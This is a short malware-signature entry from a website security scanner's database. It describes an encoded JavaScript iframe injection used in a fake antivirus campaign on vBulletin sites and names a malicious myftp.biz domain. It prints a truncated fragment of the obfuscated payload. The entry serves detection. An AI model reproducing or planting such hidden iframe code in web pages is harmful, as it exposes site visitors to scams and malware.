SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwjsiframe781

malware-entry-mwjsiframe781

Description: Conditional malware identified and hidden inside an encoded javascript block. It is used to hide an iframe used for a Fake AV campaign.
Domains involved:

http://xxbqjsb.myftp.biz/glwq
.. others within myftp.biz (randomly generated)

Affecting: Common on Vbulletin sites.

Latest update: 2013/Jun

Malware dump:

document.write(String. fromCharCode('>uv{ng@0vnnt:nq"}"rqukvkqp..